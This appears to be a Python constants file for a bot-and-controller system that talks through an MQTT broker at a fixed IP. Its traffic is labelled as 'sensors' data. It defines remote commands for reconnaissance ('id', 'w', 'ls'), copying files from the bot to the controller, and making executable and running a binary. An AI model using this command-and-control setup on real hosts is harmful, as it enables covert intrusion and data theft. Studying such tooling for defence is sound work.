BROKER = "147.32.82.209"
PORT = 1883
TOPIC = "sensors"

CONTROLLER_ID ="GW-MASTER-01"
BOT_ID = "SNSR-UNIT-77"

DATA_KEY = "data"


CMD_ANNOUNCE_BOT = "botStatus"
CMD_LIST_FILES = "ls"
CMD_ID_HOST = "id"
CMD_WHO_IS_LOGGED_IN = "w"
CMD_COPY_FROM_BOT_TO_CONTROLLER = "get"

CMD_CHMOD_TEST_BINARY = "chmod +x ./testbinary"
CMD_RUN_TEST_BINARY = "./testbinary"


